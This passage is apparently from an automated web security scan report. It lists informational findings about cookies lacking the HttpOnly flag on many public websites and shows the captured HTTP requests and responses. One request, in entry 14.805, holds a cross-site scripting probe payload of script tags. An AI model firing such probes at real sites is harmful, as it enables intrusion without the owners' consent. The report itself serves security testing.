Host:	http://www.omniture.com
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServerhttp_omniture=84542986.5892.0000; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.omniture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Server: Omniture AWS/2.0.0
Location: http://www.omniture.com/en/
Content-Length: 313
Content-Type: text/html; charset=iso-8859-1
Vary: Accept-Encoding
Date: Tue, 25 Jan 2011 00:08:41 GMT
Connection: close
Set-Cookie: BIGipServerhttp_omniture=84542986.5892.0000; path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://www.omniture.com
...[SNIP]...

14.794. http://www.outdoorphotographer.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.outdoorphotographer.com
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

712027b123d61fc48aa279ef791369c4=23b27b102f5b9ec9a6db3d7427c77e90; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.outdoorphotographer.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:01:22 GMT
Server: Apache
Set-Cookie: 712027b123d61fc48aa279ef791369c4=23b27b102f5b9ec9a6db3d7427c77e90; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Mon, 24 Jan 2011 16:01:22 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 78555

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<
...[SNIP]...

14.795. https://www.paypal.com/cgi-bin/webscr previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.paypal.com
Path:	/cgi-bin/webscr

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

Apache=10.190.8.167.1295914136420337; path=/; expires=Thu, 17-Jan-41 00:08:56 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cgi-bin/webscr HTTP/1.1
Host: www.paypal.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

14.796. http://www.playshakespeare.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.playshakespeare.com
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

eab80364d83027bfc601e73262603d25=341187f485832c9a1355235ffc880801; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.playshakespeare.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

14.797. http://www.pwc-traderonline.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.pwc-traderonline.com
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

location=%5B%7B%22ZIP_CODE%22%3A%2275207%22%2C%22STATE_NAME%22%3A%22Texas%22%2C%22CITY_NAME%22%3A%22Dallas%22%7D%5D; expires=Wed, 25-Jan-2012 00:08:58 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.pwc-traderonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

14.798. http://www.regattaregatta.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.regattaregatta.com
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

9d1da0e50aa9b6d723bb7d2254c4deb6=e77aa027edf65e1c9fc004520497c394; path=/
currentURI=http%3A%2F%2Fwww.regattaregatta.com%2Findex.php; expires=Wed, 26-Jan-2011 02:28:38 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.regattaregatta.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

14.799. http://www.rochenhost.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.rochenhost.com
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

e2d0a354c26b66b66bc6f05a696c10dc=80669e412b6181bd9078e98c7bbdca20; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.rochenhost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:09:03 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: e2d0a354c26b66b66bc6f05a696c10dc=80669e412b6181bd9078e98c7bbdca20; path=/
Last-Modified: Tue, 25 Jan 2011 00:09:04 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 43499

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...

14.800. http://www.rochenhost.com/joomla-hosting previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.rochenhost.com
Path:	/joomla-hosting

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

e2d0a354c26b66b66bc6f05a696c10dc=7d4ee1ec8dc4603d76d48b52c3e2104c; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /joomla-hosting HTTP/1.1
Host: www.rochenhost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:01:25 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: e2d0a354c26b66b66bc6f05a696c10dc=7d4ee1ec8dc4603d76d48b52c3e2104c; path=/
Last-Modified: Mon, 24 Jan 2011 16:01:25 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 43135

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...

14.801. http://www.rockettheme.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.rockettheme.com
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

cd6974ce18b02e32626c9ea04659f148=eec83c2a8abb5457a4ec33e10c194c24; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.rockettheme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

14.802. http://www.rvtraderonline.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.rvtraderonline.com
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

location=%5B%7B%22ZIP_CODE%22%3A%2275207%22%2C%22STATE_NAME%22%3A%22Texas%22%2C%22CITY_NAME%22%3A%22Dallas%22%7D%5D; expires=Wed, 25-Jan-2012 00:09:09 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.rvtraderonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

14.803. http://www.snowmobiletraderonline.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.snowmobiletraderonline.com
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

location=%5B%7B%22ZIP_CODE%22%3A%2275207%22%2C%22STATE_NAME%22%3A%22Texas%22%2C%22CITY_NAME%22%3A%22Dallas%22%7D%5D; expires=Wed, 25-Jan-2012 00:09:18 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.snowmobiletraderonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

14.804. http://www.soundingsonline.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

d4dad6935f632ac35975e3001dc7bbe8=tuebuqj09e756i1v904bm8i7l6; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 00:09:27 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
Set-Cookie: d4dad6935f632ac35975e3001dc7bbe8=tuebuqj09e756i1v904bm8i7l6; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 00:09:26 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

14.805. http://www.soundingsonline.com/archives previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/archives

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

d4dad6935f632ac35975e3001dc7bbe8=2si0fjj7r75bjp5ncust0p83f6; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /archives?'"--></style></script><script>alert(0x001E2B)</script> HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: www.soundingsonline.com

Response

14.806. http://www.staples.com/ecoeasy previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.staples.com
Path:	/ecoeasy

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

zipcode=20001; expires=Mon, 20-Jan-2031 04:38:36 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ecoeasy HTTP/1.1
Host: www.staples.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Server: IBM_HTTP_Server
Location: http://www.staples.com/sbd/cre/marketing/ecoeasy/index.html
Content-Length: 334
Content-Type: text/html; charset=iso-8859-1
Date: Tue, 25 Jan 2011 04:38:36 GMT
Connection: close
Set-Cookie: stop_mobi=yes; path=/; domain=staples.com
Set-Cookie: zipcode=20001; expires=Mon, 20-Jan-2031 04:38:36 GMT; path=/
ZipCodeDebug: Cookie=absent_BestGuess=present
Cache-Control: max-age=7200
Expires: Tue, 25 Jan 2011 06:38:36 GMT

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://www.staples.com/
...[SNIP]...

14.807. http://www.stumbleupon.com/submit previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.stumbleupon.com
Path:	/submit

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

cmf_i=13426481494d3e53cc345a97.61014341; expires=Thu, 24-Feb-2011 04:38:36 GMT; path=/; domain=.stumbleupon.com
cmf_spr=A%2FN; expires=Thu, 24-Feb-2011 04:38:36 GMT; path=/; domain=.stumbleupon.com
cmf_sp=http%3A%2F%2Fwww.stumbleupon.com%2Fsubmit; expires=Thu, 24-Feb-2011 04:38:36 GMT; path=/; domain=.stumbleupon.com
su_c=92463dc5d22c4f2ef5a9ff3749f7e1d8%7C%7C10%7C%7C1295930316%7C4385bda480c51506e13ba04652aa4a57; expires=Fri, 22-Jan-2021 04:38:36 GMT; path=/; domain=.stumbleupon.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /submit HTTP/1.1
Host: www.stumbleupon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

14.808. http://www.thepointebrodiecreek.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.thepointebrodiecreek.com
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

aa12208afb9625fd94ad3303695798d2=04f33c6a4636df9808d42509edf25600; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.thepointebrodiecreek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:38:48 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: aa12208afb9625fd94ad3303695798d2=04f33c6a4636df9808d42509edf25600; path=/
Last-Modified: Tue, 25 Jan 2011 04:38:48 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 10968

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<
...[SNIP]...

14.809. http://www.tradeonlytoday.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.tradeonlytoday.com
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

d4dad6935f632ac35975e3001dc7bbe8=l5185bjr0f1asmstu2ppbn0lg1; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.tradeonlytoday.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 00:09:44 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
Set-Cookie: d4dad6935f632ac35975e3001dc7bbe8=l5185bjr0f1asmstu2ppbn0lg1; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 00:09:44 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<
...[SNIP]...

14.810. http://www.tuenti.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.tuenti.com
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

ourl=deleted; expires=Mon, 25-Jan-2010 04:39:16 GMT; path=/; domain=.tuenti.com
manual_logout=deleted; expires=Mon, 25-Jan-2010 04:39:16 GMT; path=/; domain=.tuenti.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.tuenti.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate
Expires: Mon, 26 Jul 2005 04:59:59 GMT
Content-Type: text/html
Set-Cookie: ourl=deleted; expires=Mon, 25-Jan-2010 04:39:16 GMT; path=/; domain=.tuenti.com
Set-Cookie: manual_logout=deleted; expires=Mon, 25-Jan-2010 04:39:16 GMT; path=/; domain=.tuenti.com
X-Tuenti-State: logout
Connection: close
Date: Tue, 25 Jan 2011 04:39:17 GMT
Content-Length: 1619

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><meta http-equiv="
...[SNIP]...

14.811. https://www.tuenti.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.tuenti.com
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

ourl=deleted; expires=Mon, 25-Jan-2010 04:39:28 GMT; path=/; domain=.tuenti.com
manual_logout=deleted; expires=Mon, 25-Jan-2010 04:39:28 GMT; path=/; domain=.tuenti.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.tuenti.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

14.812. http://www.usaca.info/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.usaca.info
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

3730abe3084fe49ecac82b2df16b8c34=t18frpf95fah7u5jd67rlg4355; path=/
ja_purity_tpl=ja_purity; expires=Sun, 15-Jan-2012 04:39:36 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.usaca.info
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

14.813. http://www.veoh.com/videodetails2.swf previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.veoh.com
Path:	/videodetails2.swf

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

veohCookie="VisitorUID=3C63CE89-84A4-E8E9-AE48-C8056B139C28&LastUpdate=24/Jan/2011:20:39:36 -0800&first=0"; domain=.veoh.com; Expires=Sat, 24 Jan 2015 04:39:36 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /videodetails2.swf HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

14.814. http://www.walnecks.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.walnecks.com
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

location=%5B%7B%22ZIP_CODE%22%3A%2275207%22%2C%22STATE_NAME%22%3A%22Texas%22%2C%22CITY_NAME%22%3A%22Dallas%22%7D%5D; expires=Wed, 25-Jan-2012 00:10:51 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.walnecks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

14.815. http://www.wireless.att.com/learn/articles-resources/community-support/recycling.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wireless.att.com
Path:	/learn/articles-resources/community-support/recycling.jsp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

TLTHID=3A374D86283D102802CDB8903992A194; Path=/; Domain=.att.com
TLTSID=3A374D86283D102802CDB8903992A194; Path=/; Domain=.att.com
TLTUID=3A374D86283D102802CDB8903992A194; Path=/; Domain=.att.com; Expires=Tue, 25-01-2021 04:40:25 GMT
DYN_USER_ID=3531123409; path=/
DYN_USER_CONFIRM=2afae30a32d18177a2afef4e6b409767; path=/
ECOM_GTM=NA_osaln; domain=.att.com; expires=Wednesday, 25-Jan-2012 04:40:25 GMT; path=/
browserid=A001361839192; domain=.att.com; expires=Wednesday, 25-Jan-2012 04:40:25 GMT; path=/
BIGipServerpWL_7010_7011=1776406919.25115.0000; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

14.816. http://www.x64bitdownload.com/64-bit-archive-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-archive-downloads.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A7%3A%22archive%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A7%3A%22archive%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.817. http://www.x64bitdownload.com/64-bit-assembling-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-assembling-downloads.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A10%3A%22assembling%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A10%3A%22assembling%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.818. http://www.x64bitdownload.com/64-bit-atom-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-atom-downloads.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A4%3A%22atom%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A4%3A%22atom%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.819. http://www.x64bitdownload.com/64-bit-audio-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-audio-downloads.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A5%3A%22audio%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A5%3A%22audio%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.820. http://www.x64bitdownload.com/64-bit-automatic-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-automatic-downloads.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A9%3A%22automatic%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A9%3A%22automatic%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.821. http://www.x64bitdownload.com/64-bit-autoposter-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-autoposter-downloads.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A10%3A%22autoposter%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A10%3A%22autoposter%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.822. http://www.x64bitdownload.com/64-bit-binaries-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-binaries-downloads.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A8%3A%22binaries%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A8%3A%22binaries%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.823. http://www.x64bitdownload.com/64-bit-binary-downloader-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-binary-downloader-downloads.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A17%3A%22binary-downloader%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A17%3A%22binary+downloader%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.824. http://www.x64bitdownload.com/64-bit-binary-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-binary-downloads.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A6%3A%22binary%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A6%3A%22binary%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.825. http://www.x64bitdownload.com/64-bit-board-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
